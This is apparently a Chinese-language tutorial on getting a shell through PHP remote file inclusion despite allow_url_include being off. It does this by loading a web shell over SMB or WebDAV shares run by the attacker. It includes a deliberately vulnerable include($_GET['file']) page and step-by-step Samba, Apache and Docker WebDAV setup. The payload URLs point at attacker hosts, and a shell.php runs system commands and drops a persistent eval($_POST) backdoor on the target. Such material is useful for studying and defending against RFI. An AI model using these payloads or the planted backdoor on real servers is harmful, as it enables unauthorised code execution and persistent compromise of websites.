RFI绕过url协议限制getshell

RFI绕过url协议限制getshell

远程文件包含漏洞利用条件需要开启allow_url_fopen、allow_url_include都为On

allow_url_fopen=On
allow_url_include=On

但是php版本自从php 5.2以后allow_url_include默认为Off,导致无法getshell
php 5.6.x 的php.ini配置

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include = Off

RFI 基础

PHP中引发文件包含漏洞的通常主要是以下四个函数:
include()
include_once()
require()
require_once()

include()

include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行

require()

require() 函数包含出错的话,则会直接退出,后续语句不在执行

include_once() 和 require_once()

require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它。once就是一次的意思。

RFI 缺陷

php.ini中可以看到 allow_url_fopen和allow_url_include主要是针对两种协议起作用:http://、 ftp://
使用其他协议绕过,例如SMBWebDAV等协议。

RFI 绕过—SMB协议

测试代码

<?php
    $file=$_GET['file'];
    include $file;
?>

攻击原理

unc -> smb

攻击场景

当易受攻击的PHP应用程序代码尝试从攻击者控制的SMB服务器共享加载PHP Web shell时,SMB共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。

环境配置

首先,重新配置PHP环境,在php.ini文件中禁用allow_url_fopen以及allow_url_include。然后,配置SMB服务器具有匿名读访问权限。

PHP环境设置

首先,在受害者主机上配置php.ini,将allow_url_fopen和allow_url_include设置为Off,重启生效。

SAMBA服务器环境配置

需要使用匿名读取访问权限配置SAMBA服务器(Ubuntu18.04)

Samba是在Linux和UNIX系统上实现SMB协议的一个软件

(1)安装SAMBA服务器

apt-get install samba

(2)创建SMB共享目录和 php webshell

mkdir /var/www/html/pub/
touch /var/www/html/pub/shell.php


(3)配置新创建的SMB共享目录的权限

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/


(4)编辑samba配置文件/etc/samba/smb.conf
运行以下提到的命令以删除SAMBA服务器配置文件的默认内容

echo > /etc/samba/smb.conf
#再编辑配置文件
vim /etc/samba/smb.conf

将下面的内容放在/etc/samba/smb.conf文件中

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

(5)重新启动SAMBA服务器以应用配置文件/etc/samba/smb.conf中的新配置

service smbd restart

比如,SAMBA服务器IP是192.168.23.129,我需要访问Windows文件浏览器中的SMB共享,如下:

\\192.168.23.129\

Getshell

在环境都配置完且验证之后,利用samba目录/var/www/html/pub中共享的WebShell进行GetShell
payload

http://127.0.0.1/index.php?file=\\192.33.6.145\ethan\shell.php

停用samba

/etc/init.d/samba stop

SMB总结

针对smb利用的局限性,因为这种unc只能是在windows下使用,而且,smb端口(445) 在国内已经被封杀的差不多了(勒索病毒!!!),很难应用到实际中,但是其他的像webdav这种同理也是可以被包含的,且利用的价值更大。

RFI 绕过—WebDAV协议

WebDAV(Web 分布式创作和版本管理)是一项基于 HTTP/1.1 协议的通信协议。它扩展了HTTP/1.1 协议,在Get、Post、Put、Delete 等HTTP标准方法外添加了新方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)和解锁(Unlock),以及文件的版本控制。

测试代码

<?php
    $file=$_GET['file'];
    include $file;
?>

攻击原理

类unc -> WebDAV

攻击场景

当易受攻击的PHP应用程序代码尝试从攻击者控制的WebDAV服务器共享加载PHP Web shell时,WebDAV共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的WebDAV服务器。因此,一旦易受攻击的应用程序尝试从WebDAV共享访问PHP Web shell,WebDAV服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。

环境配置

PHP环境设置,同样设置为Off。

WebDAV服务器环境配置

需要使用匿名读取访问权限配置WebDAV服务器。

1、Ubuntu18.04手动搭建WebDAV服务器
(1)安装Apache Web服务器

sudo apt-get install -y apache2

(2)在Apache配置中启用WebDAV模块

sudo a2enmod dav
sudo a2enmod dav_fs

(3)创建WebDAV共享目录webdav和 php webshell

sudo mkdir -p /var/www/html/webdav
sudo touch /var/www/html/webdav/shell.php


(4)将文件夹所有者更改为您的Apache用户,www-data以便Apache具有对该文件夹的写访问权

sudo chown -R www-data:www-data  /var/www/

(5)编辑WebDAV配置文件

vim /etc/apache2/sites-available/000-default.conf

不需要启用身份验证,在</VirtualHost>前面添加如下代码

Alias /webdav /var/www/html/webdav 
<Directory /var/www/html/webdav> 
    DAV On 
</Directory>


(6)重新启动Apache服务器,以使更改生效

sudo service apache2 restart

成功重新启动Apache服务器后,尝试访问WebDAV共享并确保WebDAV服务器不要求凭据。

除了上面在Ubuntu上一步步安装WebDAV服务器外,还可以利用做好的Docker镜像。

2、WebDAV Docker镜像

推荐使用Docker镜像方式去安装利用,免去一些因环境或配置不当而产生的问题

(1)拉取webdav镜像
镜像地址:https://hub.docker.com/r/bytemark/webdav

docker pull bytemark/webdav

(2)用docker启动一个webdav服务器

docker run -v ~/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav

(3)在~/webdav/data目录里面共享自己php脚本

Getshell

payload

http://127.0.0.1:8888/index.php?file=\\10.10.10.10//webdav/shell.php

shell.php

<?php system("whoami");phpinfo();?>
<?php fputs(fopen('poc.php','w'),'<?php @eval($_POST[abc])?>');?>

为什么这个不能直接加载一句话木马呢,因为使用PHP文件包含函数远程加载Webdav共享文件时,不能附加消息(GET/POST),但是我们可以自定义shell.php,通过服务器加载远程shell.php给我们自动生成一个Webshell。


从图中可以看到远程加载shell.php利用成功,可以根据状态码分析其加载过程:

其中code 207是由WebDAV(RFC 2518)扩展的状态码,代表之后的消息体将是一个XML消息,并且可能依照之前子请求数量的不同,包含一系列独立的响应代码。

WebDAV总结

webdav如今很多人都将其作为自己的个人数据共享存储服务器,其局限性远远小于SMB。

稳定性比较

smb协议更稳定些。

参考

RFI 巧用 WebDAV 绕过 URL 包含限制 Getshellhttps://paper.seebug.org/1148/
RFI-SMB http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html